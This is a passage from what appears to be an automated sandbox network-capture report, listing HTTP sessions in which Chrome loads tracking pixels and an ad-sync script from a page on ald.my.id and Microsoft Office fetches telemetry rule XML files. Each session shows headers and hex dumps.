                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 61 72 63 68 69 76 65 2c 48 45 41 44 45 52 2e 65 6e 74 72 79 2d 68 65 61 64 65 72 5c 5c 5c 22 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 23 67 6d 72 2d 6d 61 69 6e 2d 6c 6f 61 64 5c 5c 5c 5c 75 30 30 33 65 41 52 54 49 43 4c 45 2e 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 2e 67 6d 72 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 2e 69 74 65 6d 2d 69 6e 66 69 6e 69 74 65 2e 67 6d 72 2d 73 6d 61 6c 6c 74 68 75 6d 62 2e 63 6c 65 61 72 66 69 78 2e 70 6f 73 74 2e 74 79 70 65 2d 70 6f 73 74 2e 73 74 61 74 75 73 2d 70 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ll,null,null,[],null,null,\\\"DIV.entry-content.entry-content-archive,HEADER.entry-header\\\"]],[[null,null,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.status-pu
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC309INData Raw: 65 7d 5c 5c 5c 22 2c 6e 75 6c 6c 2c 5c 5c 5c 22 4f 70 65 6e 20 41 75 74 6f 53 65 61 72 63 68 5c 5c 5c 22 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 72 2d 64 64 36 30 62 31 34 62 39 39 63 65 37 35 36 36 35 5c 5c 5c 22 2c 74 72 75 65 2c 6e 75 6c 6c 2c 74 72 75 65 2c 5b 74 72 75 65 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5c 5c 5c 22 54 6f 67 67 6c 65 20 74 6f 6f 6c 62 61 72 20 65 78 70 61 6e 73 69 6f 6e 5c 5c 5c 22 2c 5c 5c 5c 22 54 6f 67 67 6c 65 20 70 72 69 76 61 63 79 20 61 6e 64 20 6c 65 67 61 6c 20 73 65 74 74 69 6e 67 73 20 64 69 73 70 6c 61 79 5c 5c 5c 22 2c 5c 5c 5c 22 44 69 73 6d 69 73 73 20 70 72 69 76 61 63 79 20 61 6e 64 20 6c 65 67 61 6c 20 73 65 74 74 69 6e 67 73 20 64 69 73 70 6c 61 79 5c 5c 5c 22 5d 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e}\\\",null,\\\"Open AutoSearch\\\"],null,null,\\\"r-dd60b14b99ce75665\\\",true,null,true,[true]],null,null,null,null,[[\\\"Toggle toolbar expansion\\\",\\\"Toggle privacy and legal settings display\\\",\\\"Dismiss privacy and legal settings display\\\"]]


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          46192.168.2.74977067.202.105.334432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC913OUTGET /b/p?id=wu!&lm=0&ts=1728897155274&dn=AFWU&iso=0&pu=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F&t=Csh%20Verify&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ic.tynt.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          server: nginx/1.16.1
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          content-length: 35
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Fri, 16 Apr 2010 15:38:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          etag: "4bc8846c-23"
                                                                                                                                                                                                                                                                                                                                                                          cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
                                                                                                                                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                                                                                                                                          expires: "Sat, 26 Jul 1997 05:00:00 GMT"
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: uid=CoIKTGcM4IVmhx3SBPwzAg==; expires=Tue, 14-Oct-25 09:12:37 GMT; domain=tynt.com; path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          p3p: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
                                                                                                                                                                                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          47192.168.2.74977152.59.151.854432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC760OUTGET /pd/dtscout?_t_=px&url=https%3A%2F%2Fald.my.id%2F&event_source=dtscout&rnd=0.9666548919402609&exptid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&fcmp=false HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pd.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          48192.168.2.74977467.202.105.314432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC818OUTGET /deb/v2?id=wu!&dn=AFWU&cc=1&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117&r=https%3A%2F%2Fald.my.id%2F&pu=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: de.tynt.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC910INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false
                                                                                                                                                                                                                                                                                                                                                                          expires: Sat, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: uid=OY/j22cM4IWn+sRSNrMbgw==;Version=1;Comment=;SameSite=None;Domain=tynt.com;Path=/;Max-Age=31536000;Secure
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pids=%5B%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D;Version=1;Comment=;SameSite=None;Domain=tynt.com;Path=/;Max-Age=7776000;Secure
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          content-length: 946
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC946INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 64 3d 64 6f 63 75 6d 65 6e 74 2c 70 3d 22 75 6e 73 61 66 65 2d 75 72 6c 22 2c 65 2c 73 2c 74 2c 75 3d 5b 22 68 74 74 70 73 3a 2f 2f 72 63 2e 72 6c 63 64 6e 2e 63 6f 6d 2f 33 36 31 37 32 36 2e 67 69 66 3f 6e 3d 31 26 33 33 72 61 6e 64 6f 6d 3d 31 37 32 38 38 39 37 31 35 37 32 31 38 2e 31 22 2c 22 68 74 74 70 73 3a 2f 2f 69 2e 73 69 6d 70 6c 69 2e 66 69 2f 64 70 78 3f 63 69 64 3d 31 31 34 31 31 26 75 73 5f 70 72 69 76 61 63 79 3d 26 33 33 72 61 6e 64 6f 6d 3d 31 37 32 38 38 39 37 31 35 37 32 31 38 2e 32 26 72 65 66 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 61 6c 64 2e 6d 79 2e 69 64 25 32 46 22 2c 22 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 74 63 2e 33 33 61 63 72 6f 73 73 2e 63 6f 6d 2f 6c 6f 74 61 6d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function(){var i,d=document,p="unsafe-url",e,s,t,u=["https://rc.rlcdn.com/361726.gif?n=1&33random=1728897157218.1","https://i.simpli.fi/dpx?cid=11411&us_privacy=&33random=1728897157218.2&ref=https%3A%2F%2Fald.my.id%2F","1https://cdn-tc.33across.com/lotam


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          49192.168.2.74977713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: a5b27f46-b01e-003d-5a47-1cd32c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cf9wwz8ehu7c5p33g00000003c0000000009fa3
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          50192.168.2.74977813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: fa6a24a8-e01e-0099-78e3-1ada8a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cfvzwz27u5rnq9kpc00000006fg000000005mt2
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          51192.168.2.74977613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 94304cac-901e-0048-809f-1bb800000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cf9c22xp43k2gbqvn00000003ug000000005h6w
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          52192.168.2.74977513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 77080ea6-601e-003e-13e1-1a3248000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cfbd7pgux3k6qfa6000000004zg00000000a458
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
